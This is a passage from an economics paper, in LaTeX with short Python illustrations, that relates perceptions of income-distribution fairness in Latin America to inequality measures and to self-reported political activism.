Taken together, these results show that there are political activities for which fairness views and income inequality have predictive power independent of each other (like complaining through social media). However, there are also activities that are exclusively predicted by income inequality (like participating in an unauthorized protest) or fairness views (like signing a petition). This suggests that both fairness views and income inequality capture different channels through which changes in the income distribution can affect social unrest.
\section{Conclusions} \label{sec_conclusions}
In this paper, we analyze perceptions of distributive justice in a context of falling income inequality. We show that fairness beliefs moved in line with the evolution of objective inequality indicators: both unfairness perceptions and income inequality declined across countries and over time in our sample. Some individual-level characteristics, such as employment status and political ideology, are systematically correlated with fairness views. Fairness views have predictive power for self-reported propensity to mobilize above and beyond income inequality (and vice versa).
Our findings are relevant for both researchers and policymakers. For researchers, our results suggest that, in some contexts, one can proxy fairness views using relative measures of income inequality, such as the widely used Gini coefficient. This is reassuring since inequality measures are much more widely available than fairness views in standard datasets.
For policymakers, our findings warn about concerning levels of dissatisfaction with existing income disparities. Three in four Latin Americans believe that the income distribution is unfair, and such perceptions have proved to be relatively inelastic to a large compression of the income distribution by historical standards. If fairness perceptions are interpreted as preferences for some leveling of income, our results indicate that a striking majority is in favor of reducing the existing disparities between the rich and the poor, while relatively few people believe that income disparities should remain the same. A second actionable insight for policymakers is that fairness views act as a thermometer of individuals' latent propensity to engage in political activities. Thus, if policymakers want to prevent social unrest, they ought to pay attention to the evolution of fairness views and take preventive measures before the majority of people perceive the income distribution as unfair.
A caveat with our results is that we cannot tell whether most individuals believe that the income distribution is unfair because (i) they have inaccurate views about the level of income inequality (perhaps, believing that income is more unequally distributed than it objectively is); or (ii) individuals accurately assess the level of inequality and believe that existing inequities are unfair (perhaps, because the process that generates income differences is not fair or because existing inequities are too large). Disentangling the contribution of these and other channels is a challenge for future research.
\section*{Tables and Figures}
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Correlation between inequality indicators and fairness views, 1997-2015}\label{tab-rel-fairness}
\begin{tabular}{lccccccccccc}
\midrule
& \multicolumn{3}{c}{} & & \multicolumn{3}{c}{} & & \multicolumn{3}{c}{Averaging correlations} \\
& \multicolumn{3}{c}{Individual-level data} & & \multicolumn{3}{c}{Country-by-year level data} & & \multicolumn{3}{c}{across countries} \\
\cmidrule{2-4}\cmidrule{6-8}\cmidrule{10-12} & U./V.U. & V.U. & U. & & U./V.U. & V.U. & U. & & U./V.U. & V.U. & U. \\
& (1) & (2) & (3) & & (4) & (5) & (6) & & (7) & (8) & (9) \\
\midrule
Gini coefficient & 0.39 & 0.36 & 0.10 & & 0.84 & 0.82 & 0.25 & & 0.39 & 0.28 & 0.15 \\
& (0.07) & (0.07) & (0.09) & & (0.10) & (0.16) & (0.35) & & (0.07) & (0.07) & (0.09) \\
Theil index & 0.39 & 0.38 & 0.05 & & 0.85 & 0.82 & 0.27 & & 0.33 & 0.20 & 0.18 \\
& (0.07) & (0.07) & (0.09) & & (0.09) & (0.16) & (0.35) & & (0.07) & (0.07) & (0.09) \\
Atkinson, A(0.5) & 0.38 & 0.35 & 0.10 & & 0.84 & 0.82 & 0.25 & & 0.37 & 0.26 & 0.15 \\
& (0.07) & (0.07) & (0.09) & & (0.10) & (0.16) & (0.35) & & (0.07) & (0.07) & (0.09) \\
Atkinson, A(1) & 0.36 & 0.30 & 0.13 & & 0.84 & 0.82 & 0.25 & & 0.38 & 0.28 & 0.13 \\
& (0.07) & (0.08) & (0.09) & & (0.10) & (0.16) & (0.34) & & (0.07) & (0.08) & (0.09) \\
Mean log deviation & 0.35 & 0.29 & 0.14 & & 0.84 & 0.82 & 0.25 & & 0.38 & 0.28 & 0.13 \\
& (0.07) & (0.08) & (0.09) & & (0.10) & (0.16) & (0.34) & & (0.07) & (0.08) & (0.09) \\
Coefficient of variation & 0.33 & 0.36 & 0.00 & & 0.78 & 0.78 & 0.19 & & 0.18 & 0.20 & 0.10 \\
& (0.08) & (0.08) & (0.09) & & (0.13) & (0.16) & (0.36) & & (0.08) & (0.08) & (0.09) \\
Ratio 75/25 & 0.29 & 0.15 & 0.24 & & 0.80 & 0.78 & 0.26 & & 0.36 & 0.29 & 0.12 \\
& (0.07) & (0.09) & (0.08) & & (0.11) & (0.17) & (0.33) & & (0.07) & (0.09) & (0.08) \\
Generalized entropy & 0.29 & 0.35 & -0.04 & & 0.80 & 0.72 & 0.35 & & 0.18 & 0.09 & 0.19 \\
& (0.05) & (0.08) & (0.08) & & (0.11) & (0.18) & (0.34) & & (0.05) & (0.08) & (0.08) \\
Ratio 90/10 & 0.23 & 0.10 & 0.21 & & 0.81 & 0.79 & 0.25 & & 0.30 & 0.30 & 0.07 \\
& (0.07) & (0.08) & (0.08) & & (0.11) & (0.17) & (0.32) & & (0.07) & (0.08) & (0.08) \\
Variance & -0.08 & -0.01 & -0.12 & & -0.25 & 0.10 & -0.71 & & -0.06 & 0.04 & -0.12 \\
& (0.07) & (0.08) & (0.08) & & (0.39) & (0.43) & (0.14) & & (0.07) & (0.08) & (0.08) \\
Absolute Gini & -0.21 & -0.10 & -0.18 & & -0.71 & -0.46 & -0.64 & & -0.18 & -0.10 & -0.22 \\
& (0.09) & (0.10) & (0.08) & & (0.23) & (0.26) & (0.31) & & (0.09) & (0.10) & (0.08) \\
Kolm, K(1) & -0.31 & -0.18 & -0.22 & & -0.80 & -0.64 & -0.50 & & -0.22 & -0.16 & -0.22 \\
& (0.09) & (0.10) & (0.08) & & (0.12) & (0.18) & (0.37) & & (0.09) & (0.10) & (0.08) \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table presents correlations between fairness views and income inequality. In columns 1--3, we calculate the correlations at the individual-level pooling all countries and years in our sample. In columns 4--6, we calculate the average unfairness views in each country-year and then calculate the correlation between each inequality indicator in the corresponding country-year and the average fairness views. In columns 7--9, we calculate the correlation between each inequality indicator and fairness views over time for each country separately (using the individual-level data) and then average the correlations across countries. U./V.U. stands for ``Unfair or Very Unfair''; V.U. stands for ``Very Unfair''; and U. stands for ``Unfair.'' Bootstrapped standard errors are in parentheses.
\end{singlespace}
}
\end{table}
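To make the three aggregation schemes behind columns 1--3, 4--6, and 7--9 concrete, the sketch below reproduces them on synthetic data (the data-generating process is hypothetical, and the bootstrap for the standard errors is omitted):

```python
import numpy as np
import pandas as pd

# Synthetic stand-in for the pooled individual-level data: each row is a
# respondent with a country, a year, the country-year Gini (constant
# within cell), and a 0/1 unfairness view that rises with the Gini.
rng = np.random.default_rng(1)
n = 5000
df = pd.DataFrame({
    "country": rng.integers(0, 18, n),
    "year": rng.choice([1997, 2007, 2015], n),
})
gini = {(c, y): 0.40 + 0.15 * rng.random()
        for c in range(18) for y in (1997, 2007, 2015)}
df["gini"] = [gini[cy] for cy in zip(df["country"], df["year"])]
df["unfair"] = (rng.random(n) < 2 * df["gini"] - 0.3).astype(int)

# Columns 1-3: correlate at the individual level, pooling all cells.
pooled = df["unfair"].corr(df["gini"])

# Columns 4-6: average views within each country-year cell, then correlate.
cells = df.groupby(["country", "year"])[["unfair", "gini"]].mean()
aggregated = cells["unfair"].corr(cells["gini"])

# Columns 7-9: one correlation per country (over time), then average.
per_country = df.groupby("country").apply(
    lambda g: g["unfair"].corr(g["gini"]))
averaged = per_country.mean()
```

Aggregating to country-year cells averages out individual-level noise, which is why the correlations in columns 4--6 of the table are substantially larger than their individual-level counterparts.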
\clearpage
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{Logit regressions of unfairness perceptions (very unfair) and individuals' characteristics} \label{very_unfair_logit}
\newcommand\w{1.30}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& \multicolumn{12}{c}{Dependent Variable: Believes income distribution is very unfair} \\\cmidrule{3-14}
&& (1) && (2) && (3) && (4) && (5) && (6) \\
\midrule
\ExpandableInput{results/very_unfair_logit}
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table shows estimates of the relationship between an indicator that equals one for individuals who believe that the income distribution is very unfair and the Gini coefficient, controlling for individuals' characteristics. Coefficients are estimated through Logit regressions and represent the marginal effects evaluated at the mean values of the rest of the variables. Observations are weighted by the individual's probability of being interviewed. All specifications include country and year fixed effects. $^{***}$, $^{**}$ and $^*$ denote significance at 1\%, 5\% and 10\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\begin{landscape}
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{Logit regressions of unfairness perceptions (very unfair) and activism}\label{very_unfair_unrest_past}
\newcommand\w{1.58}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& Complain && && && && && Refuse && && Occupy && Activism \\
&& on social && Complain && Sign a && Authorized && Unauth. && to pay && Participate && land or && composite \\
&& media && to media && petition && protest && protest && taxes && in riots && buildings && index \\
&& (1) && (2) && (3) && (4) && (5) && (6) && (7) && (8) && (9) \\
\midrule
\addlinespace
\multicolumn{14}{l}{\hspace{-1em} \textbf{Panel A.\ Dependent variable: Have done the activity in the past}} \\
\midrule
\ExpandableInput{results/very_unfair_unrest_past}
\midrule
\addlinespace
\multicolumn{14}{l}{\hspace{-1em} \textbf{Panel B.\ Dependent variable: Have done the activity in the past or would do the activity}} \\
\midrule
\ExpandableInput{results/very_unfair_unrest_would}
\midrule
\addlinespace
\ExpandableInput{results/very_unfair_unrest_past_N}
\midrule
\end{tabular}
\end{center}
\begin{singlespace}
\noindent \justify \textbf{Notes:} This table shows estimates of the determinants of participating in the political activity listed in the column header. Coefficients are estimated through Logit regressions and represent the marginal effects evaluated at the mean values of the rest of the variables. Observations are weighted by the individual's probability of being interviewed. All specifications control for age, age squared, gender, marital status, maximum educational attainment, labor force participation, unemployment status, assets index, political ideology, and religion. The regression in column 3 also controls for country and year fixed effects. Column 9 shows a composite index which takes the value one if the individual reports having engaged in tax evasion, participated in an illegal protest, signed a petition, or complained to the media, and zero otherwise. The rest of the political activities are available in only one year and thus we cannot include fixed effects. Participation in political activities is self-reported. $^{***}$, $^{**}$ and $^*$ denote significance at 1\%, 5\% and 10\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\end{landscape}
\clearpage
\begin{figure}[htp]{\scriptsize
\begin{centering}
\protect\caption{Fairness views in Latin America over time and across countries} \label{fig-fairness-views}
\begin{minipage}{.48\textwidth}
\caption*{Panel A. Fairness views over time \\ (1997--2015)}\label{fig-fairness-views-time}
\includegraphics[width=\linewidth]{results/fig-intensity-fairness}
\end{minipage}\hspace{1em}
\begin{minipage}{.48\textwidth}
\caption*{Panel B. Fairness views across countries \\ (2002 vs. 2013)} \label{fig-fairness-views-countries}
\includegraphics[width=\linewidth]{results/fig-chg-fairness-0213}
\end{minipage}
\par\end{centering}
\singlespacing\justify
\textbf{Notes}: \footnotesize Panel A shows the percentage of individuals who perceive the income distribution as very unfair, unfair, fair, and very fair in our sample. We calculate the shares as the unweighted average of fairness views across the 18 countries in our sample. Panel B presents the percentage of the population who perceives the income distribution as either unfair or very unfair in 2002 and 2013 in each country of our sample.
}
\end{figure}
\clearpage
\begin{figure}[htpb]
\caption{Fairness views and income inequality in Latin America} \label{fig-fairness-gini}
\centering
\begin{subfigure}[t]{0.48\textwidth}
\caption*{Panel A. Correlation between unfairness views and Gini}\label{fig-binscatter-gini-unfair}
\centering
\includegraphics[width=\linewidth]{results/fig-binscatter-gini-unfair-all}
\end{subfigure}
\hfill
\begin{subfigure}[t]{0.48\textwidth}
\caption*{Panel B. Change in fairness and Gini across countries} \label{fig-chg-gini-unfair-0213}
\includegraphics[width=\linewidth]{results/fig-chg-gini-unfair-0213}
\end{subfigure}
\hfill
{\footnotesize
\singlespacing \justify
\textbf{Notes:} Panel A shows a binned scatterplot of fairness views and the Gini coefficient. To construct this figure, we group the Ginis of all country-years in bins of width equal to 0.02 Gini points and calculate the average fairness perceptions in each bin.
Panel B plots the percentage point change between 2002 and 2013 in the share of the population that believes that the income distribution is either unfair or very unfair ($y$-axis) against the change in the Gini coefficient between 2002 and 2013 ($x$-axis) for countries in our sample. Due to a break in data comparability or household data unavailability, for some countries, we use inequality data from adjacent years. In 2002, we use: Argentina 2004, Chile 2003, Costa Rica 2010, Ecuador 2003, Guatemala 2006, Nicaragua 2001, Panama 2008, and Peru 2004. In 2013 we use: Guatemala 2014, Mexico 2014, Nicaragua 2014, and Venezuela 2012. See Appendix \ref{sec_data} for more details.
}
\end{figure}
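The binning procedure described in the notes to Panel A can be sketched as follows (synthetic country-year data; all numbers are hypothetical):

```python
import numpy as np
import pandas as pd

# Synthetic country-year panel: a Gini coefficient and the share of
# respondents who call the income distribution unfair.
rng = np.random.default_rng(2)
panel = pd.DataFrame({"gini": rng.uniform(0.40, 0.60, 120)})
panel["unfair"] = (0.55 + 0.8 * (panel["gini"] - 0.5)
                   + rng.normal(0, 0.03, 120))

# Panel A's construction: group the Ginis into bins of width 0.02 Gini
# points, then average the fairness perceptions within each bin.
edges = np.arange(0.40, 0.62, 0.02)
panel["bin"] = pd.cut(panel["gini"], bins=edges)
binned = panel.groupby("bin", observed=True)["unfair"].mean()
```

Plotting `binned` against the bin midpoints yields a binned scatterplot of the kind shown in Panel A.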
\clearpage
\begin{figure}[htp]
\caption{Oaxaca-Blinder decomposition of unfairness perceptions, 2002-2013}\label{fig-oaxaca} \centering
\centering
\includegraphics[width=.75\linewidth]{results/fig-oaxaca-0213.png}
\hfill
{\footnotesize
\singlespacing \justify
\textbf{Notes:} This figure presents estimates of the Oaxaca-Blinder decomposition (see Appendix \ref{sec_oaxaca}). The dependent variable is an indicator that equals one for individuals who believe that the income distribution is unfair or very unfair. The regressors in the decomposition include the Gini coefficient, age, age squared, and dummy variables for marital status, gender, educational attainment, labor force participation, unemployment status, an assets index, political ideology, and religious views. The ``explained'' part of the results refers to changes in the value of the covariates, while the ``unexplained'' refers to changes in the coefficients and the interaction terms.
}
\end{figure}
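For reference, the decomposition underlying this figure can be written in its standard textbook form (generic notation; the exact specification we estimate is described in Appendix \ref{sec_oaxaca}):
\begin{equation*}
\bar{y}_{2013}-\bar{y}_{2002}=\underbrace{\left(\bar{X}_{2013}-\bar{X}_{2002}\right)'\hat{\beta}_{2002}}_{\text{explained}}+\underbrace{\bar{X}_{2002}'\left(\hat{\beta}_{2013}-\hat{\beta}_{2002}\right)+\left(\bar{X}_{2013}-\bar{X}_{2002}\right)'\left(\hat{\beta}_{2013}-\hat{\beta}_{2002}\right)}_{\text{unexplained (coefficients and interaction)}}
\end{equation*}
where $\bar{y}_{t}$ is the mean of the unfairness indicator in year $t$, $\bar{X}_{t}$ is the vector of covariate means, and $\hat{\beta}_{t}$ are the estimated coefficients.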
\section{Additional Figures and Tables} \label{app_add_figs}
\setcounter{table}{0}
\setcounter{figure}{0}
\setcounter{equation}{0}
\renewcommand{\thetable}{A\arabic{table}}
\renewcommand{\thefigure}{A\arabic{figure}}
\renewcommand{\theequation}{A\arabic{equation}}
\begin{figure}[htpb]
\caption{Perceptions of unfairness and individual characteristics, 1997--2015} \label{fig-fairness-grps}
\centering
\begin{subfigure}[t]{.48\textwidth}
\caption*{Panel A. By age}\label{fig-fairness-age}
\centering
\includegraphics[width=\linewidth]{results/fig-fairness-age}
\end{subfigure}
\hfill
\begin{subfigure}[t]{0.48\textwidth}
\caption*{Panel B. By sex}\label{fig-fairness-sex}
\centering
\includegraphics[width=\linewidth]{results/fig-fairness-sex}
\end{subfigure}
\hfill
\begin{subfigure}[t]{.48\textwidth}
\caption*{Panel C. By educational attainment}\label{fig-fairness-educ}
\centering
\includegraphics[width=\linewidth]{results/fig-fairness-educ}
\end{subfigure}
\hfill
\begin{subfigure}[t]{0.48\textwidth}
\caption*{Panel D. By employment status}\label{fig-fairness-employ}
\centering
\includegraphics[width=\linewidth]{results/fig-fairness-employ}
\end{subfigure}
\hfill
{\footnotesize
\singlespacing \justify
\textbf{Notes:} This figure shows the share of individuals who perceive the income distribution as unfair or very unfair according to their age, gender, maximum educational attainment, and employment status.
}
\end{figure}
\clearpage
\begin{figure}[htp]
\caption{The evolution of fairness views and income inequality in Latin America}\label{fig-timeseries-gini-unfair} \centering
\centering
\includegraphics[width=.75\linewidth]{results/fig-timeseries-gini-unfair}
\hfill
{\footnotesize
\singlespacing \justify
\textbf{Notes:} This figure shows the evolution of the average Gini coefficient across countries in our sample (right axis) and the fraction of the population who perceive the income distribution as unfair or very unfair (left axis) over 1997--2015. To have a balanced panel of countries over time, we linearly extrapolated the Gini coefficient in years in which income microdata are not available (see Appendix \ref{sec_data}).
}
\end{figure}
\clearpage
\begin{table}[H]{\footnotesize
\begin{center}
\caption{Descriptive statistics of our sample} \label{tab-sum-stats}
\begin{tabular}{lccc}
\midrule
& Mean & Standard Dev. & Observations \\
& (1) & (2) & (3) \\
\midrule
\textbf{\hspace{-1em} Panel A. Sociodemographic} & & & \\
Age & 39.75 & 16.23 & 225,551 \\
Male (\%) & 48.97 & 0.50 & 225,567 \\
Married or civil union (\%) & 56.27 & 0.50 & 224,081 \\
Catholic religion (\%) & 68.01 & 0.47 & 222,790 \\
Ideology (10 = right-wing) & 5.48 & 2.64 & 131,980 \\
\textbf{\hspace{-1em} Panel B. Education and Labor market} & & & \\
Literate (\%) & 90.31 & 0.30 & 224,056 \\
Secondary education or more (\%) & 33.65 & 0.47 & 224,056 \\
Parents with secondary education (\%) & 17.43 & 0.38 & 184,884 \\
Economically active (\%) & 64.14 & 0.48 & 225,222 \\
Unemployed (\% Labor Force) & 9.89 & 0.30 & 225,222 \\
\textbf{\hspace{-1em} Panel C. Access to services} & & & \\
Access to a sewerage (\%) & 69.59 & 0.46 & 222,530 \\
Access to running water (\%) & 88.83 & 0.31 & 204,340 \\
\textbf{\hspace{-1em} Panel D. Asset ownership} & & & \\
Car (\%) & 28.21 & 0.45 & 222,338 \\
Computer (\%) & 33.79 & 0.47 & 222,645 \\
Fridge (\%) & 79.22 & 0.41 & 146,686 \\
Homeowner (\%) & 73.92 & 0.44 & 223,603 \\
Mobile (\%) & 80.61 & 0.40 & 172,253 \\
Washing machine (\%) & 54.71 & 0.50 & 223,122 \\
Landline (\%) & 42.28 & 0.49 & 222,968 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Note:} This table shows summary statistics for our sample, pooling data from all countries over 1997--2015.
\end{singlespace}
}
\end{table}
\clearpage
\begin{table}[H]{\footnotesize
\begin{center}
\caption{Fairness views by population group} \label{tab-fairness-grp}
\newcommand\w{1.70}
\begin{tabular}{l@{}R{\w cm}R{\w cm}R{\w cm}R{\w cm}}
\midrule
& \multicolumn{4}{c}{\% of individuals who believe income distribution is:} \\
\cmidrule{2-5} & Very unfair & Unfair & Fair & Very fair \\
& (1) & (2) & (3) & (4) \\
\midrule
All & 28.2 & 51.6 & 17.3 & 2.9 \\
\textbf{\hspace{-1em} Panel A. Gender} & & & & \\
Female & 28.3 & 52.2 & 16.7 & 2.8 \\
Male & 28.0 & 51.1 & 17.9 & 3.0 \\
\textbf{\hspace{-1em} Panel B. Age group} & & & & \\
15-24 & 25.2 & 52.0 & 19.7 & 3.1 \\
25-40 & 28.5 & 51.3 & 17.2 & 3.0 \\
41-64 & 29.5 & 51.7 & 16.0 & 2.8 \\
65+ & 29.2 & 51.6 & 16.6 & 2.5 \\
\textbf{\hspace{-1em} Panel C. Civil status} & & & & \\
Married & 28.3 & 51.9 & 17.0 & 2.8 \\
Not married & 27.9 & 51.4 & 17.7 & 3.1 \\
\textbf{\hspace{-1em} Panel D. Religion} & & & & \\
Catholic & 28.2 & 51.7 & 17.2 & 2.9 \\
Not catholic & 28.0 & 51.5 & 17.5 & 3.0 \\
\textbf{\hspace{-1em} Panel E. Education level} & & & & \\
Less than Primary & 27.7 & 51.6 & 17.7 & 3.0 \\
Complete Primary & 27.9 & 52.2 & 17.4 & 2.6 \\
Complete Secondary & 29.1 & 53.2 & 15.0 & 2.7 \\
Complete Tertiary & 29.0 & 50.8 & 17.1 & 3.1 \\
\textbf{\hspace{-1em} Panel F. Type of employment} & & & & \\
Employee & 28.3 & 51.5 & 17.2 & 2.9 \\
Employer & 24.3 & 53.9 & 19.0 & 2.8 \\
Self-employed & 28.0 & 51.4 & 17.5 & 3.1 \\
Unemployed & 30.3 & 51.6 & 15.1 & 3.0 \\
\textbf{\hspace{-1em} Panel G. Country} & & & & \\
Argentina & 38.17 & 50.74 & 10.26 & 0.83 \\
Bolivia & 18.01 & 56.13 & 23.39 & 2.48 \\
Brazil & 31.95 & 53.71 & 12.85 & 1.49 \\
Chile & 40.20 & 49.93 & 8.42 & 1.45 \\
Colombia & 35.15 & 51.20 & 11.40 & 2.26 \\
Costa Rica & 23.20 & 53.55 & 20.13 & 3.12 \\
Dominican Rep. & 32.31 & 46.52 & 17.61 & 3.56 \\
Ecuador & 21.45 & 47.46 & 27.58 & 3.51 \\
El Salvador & 22.73 & 53.16 & 20.45 & 3.65 \\
Guatemala & 28.29 & 51.34 & 16.70 & 3.66 \\
Honduras & 28.87 & 53.42 & 14.33 & 3.38 \\
Mexico & 32.15 & 49.75 & 15.32 & 2.78 \\
Nicaragua & 18.69 & 51.88 & 24.33 & 5.11 \\
Panama & 27.39 & 48.01 & 20.25 & 4.34 \\
Paraguay & 38.31 & 48.80 & 10.95 & 1.93 \\
Peru & 25.03 & 61.89 & 11.70 & 1.38 \\
Uruguay & 18.22 & 57.51 & 22.64 & 1.64 \\
Venezuela & 23.51 & 42.96 & 26.62 & 6.92 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Note:} This table shows the fraction of individuals in our sample who perceive the income distribution as very unfair, unfair, fair, or very fair.
\end{singlespace}
}
\end{table}
\clearpage
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{Logit regressions of unfairness perceptions (unfair) and individual characteristics} \label{unfair_logit}
\newcommand\w{1.30}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& \multicolumn{12}{c}{Dependent Variable: Believes income distribution is unfair or very unfair} \\\cmidrule{3-14}
&& (1) && (2) && (3) && (4) && (5) && (6) \\
\midrule
\ExpandableInput{results/unfair_logit}
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table shows estimates of the relationship between an indicator that equals one for individuals who believe that the income distribution is unfair or very unfair and the Gini coefficient, controlling for individuals' characteristics. Coefficients are estimated through Logit regressions and represent the marginal effects evaluated at the mean values of the rest of the variables. Observations are weighted by the individual's probability of being interviewed. All specifications include country and year fixed effects. $^{***}$, $^{**}$ and $^*$ denote significance at 1\%, 5\% and 10\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\clearpage
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{Logit regressions of unfairness perceptions (very unfair) and different inequality indicators} \label{unfair_ineq_logit}
\newcommand\w{1.50}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& \multicolumn{10}{c}{Dependent Variable: Believes income distribution is very unfair} \\\cmidrule{3-12}
&& (1) && (2) && (3) && (4) && (5) \\
\midrule
\ExpandableInput{results/very_unfair_ineq_logit}
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table shows estimates of the relationship between an indicator that equals one for individuals who believe that the income distribution is very unfair and several inequality indicators, controlling for individuals' characteristics. Coefficients are estimated through Logit regressions and represent the marginal effects evaluated at the mean values of the rest of the variables. Observations are weighted by the individual's probability of being interviewed. All specifications include country and year fixed effects. $^{***}$, $^{**}$ and $^*$ denote significance at 1\%, 5\% and 10\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{OLS regressions of unfairness perceptions (very unfair) and individual characteristics} \label{very_unfair_lpm}
\newcommand\w{1.30}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& \multicolumn{12}{c}{Dependent Variable: Believes income distribution is very unfair} \\\cmidrule{3-14}
&& (1) && (2) && (3) && (4) && (5) && (6) \\
\midrule
\ExpandableInput{results/very_unfair_lpm}
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table presents estimates of the correlation between a dummy variable that indicates whether the individual believes that the income distribution is very unfair and the Gini coefficient, controlling for individuals' characteristics. Coefficients are estimated through a linear probability model. Observations are weighted by the individual's probability of being interviewed. All specifications include country and year fixed effects. $^{***}$, $^{**}$ and $^*$ denote significance at 1\%, 5\% and 10\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\section{Data Appendix} \label{sec_data}
\setcounter{table}{0}
\setcounter{figure}{0}
\renewcommand{\thetable}{B\arabic{table}}
\renewcommand{\thefigure}{B\arabic{figure}}
The data presented in this paper are based on two harmonization projects: Latinobar\'ometro and SEDLAC (Socio-Economic Database for Latin America and the Caribbean). In this Appendix, we describe how we make both sources compatible.
Our perceptions data come from Latinobar\'ometro, which has conducted opinion surveys in 18 LA countries since the 1990s, interviewing about 1,200 individuals per country about their socioeconomic background and their views on political and social issues. Unfortunately, not all years contain questions about individuals' fairness perceptions. The survey was designed to be representative of the voting-age population at the national level (in most LA countries, individuals aged 18 and over). In Table \ref{tab-coverage}, we show what percentage of the voting-age population is represented by the survey in each country for all the years in which the fairness question is available.
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Coverage of each country's population in Latinobar\'ometro over time (in \%)}\label{tab-coverage}
\begin{tabular}{lrrrrrrrrr}
\midrule
& 1997 & 2001 & 2002 & 2007 & 2009 & 2010 & 2011 & 2013 & 2015 \\
\midrule
Argentina & 68 & 75 & 75 & 100 & 100 & 100 & 100 & 100 & 100 \\
Bolivia & 32 & 52 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Brazil & 12 & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Chile & 70 & 70 & 70 & 100 & 100 & 100 & 100 & 100 & 100 \\
Colombia & 25 & 71 & 51 & 100 & 100 & 100 & 100 & 100 & 100 \\
Costa Rica & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Dominican Republic & \multicolumn{1}{c}{ N/A } & \multicolumn{1}{c}{ N/A } & \multicolumn{1}{c}{ N/A } & 100 & 100 & 100 & 100 & 100 & 100 \\
Ecuador & 97 & 97 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
El Salvador & 65 & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Guatemala & 100 & 100 & 100 & 97 & 100 & 100 & 100 & 100 & 100 \\
Honduras & 100 & 100 & 100 & 98 & 100 & 99 & 99 & 99 & 99 \\
Mexico & 93 & 88 & 95 & 100 & 100 & 100 & 100 & 100 & 100 \\
Nicaragua & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Panama & 100 & 100 & 100 & 99 & 99 & 99 & 99 & 99 & 99 \\
Paraguay & 46 & 46 & 46 & 100 & 100 & 100 & 100 & 100 & 100 \\
Peru & 52 & 52 & 100 & 100 & 100 & 100 & 100 & 100 & 100 \\
Uruguay & 80 & 80 & 80 & 100 & 100 & 100 & 100 & 100 & 100 \\
Venezuela & 100 & 100 & 100 & 100 & 93 & 100 & 100 & 100 & 100 \\
Weighted average & 68 & 86 & 91 & 100 & 100 & 100 & 100 & 100 & 100 \\
\midrule
\end{tabular}
\end{center}
}
\end{table}
Since our goal is to analyze how unfairness perceptions evolved vis-\`a-vis changes in income inequality, we put substantial effort into obtaining income inequality data for every country-year in which perceptions data are available. We made two partial fixes to increase the number of observations available (without pushing the data too much). First, we filled data gaps using household surveys from adjacent years in which previously unused data were available (see Appendix Table \ref{tab-circa}). For instance, Chile conducts household surveys on average every two years. In 1997, perceptions data are available, but income inequality data are not; we therefore use the inequality data from an adjacent year (1998). As noted previously, we draw on an adjacent year only if the perceptions question was not asked in that year (and therefore the inequality data are not needed there).
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Circa years used to fill data gaps}\label{tab-circa}
\begin{tabular}{lcc}
\midrule
Country & Year without household data & Data point used instead \\
\midrule
Chile & 1997 & 1998 \\
Chile & 2001 & 2000 \\
Chile & 2002 & 2003 \\
Chile & 2007 & 2006 \\
Colombia & 2007 & 2008 \\
Ecuador & 2002 & 2003 \\
El Salvador & 1997 & 1998 \\
Guatemala & 2001 & 2000 \\
Guatemala & 2015 & 2014 \\
Mexico & 1997 & 1998 \\
Mexico & 2001 & 2000 \\
Mexico & 2007 & 2006 \\
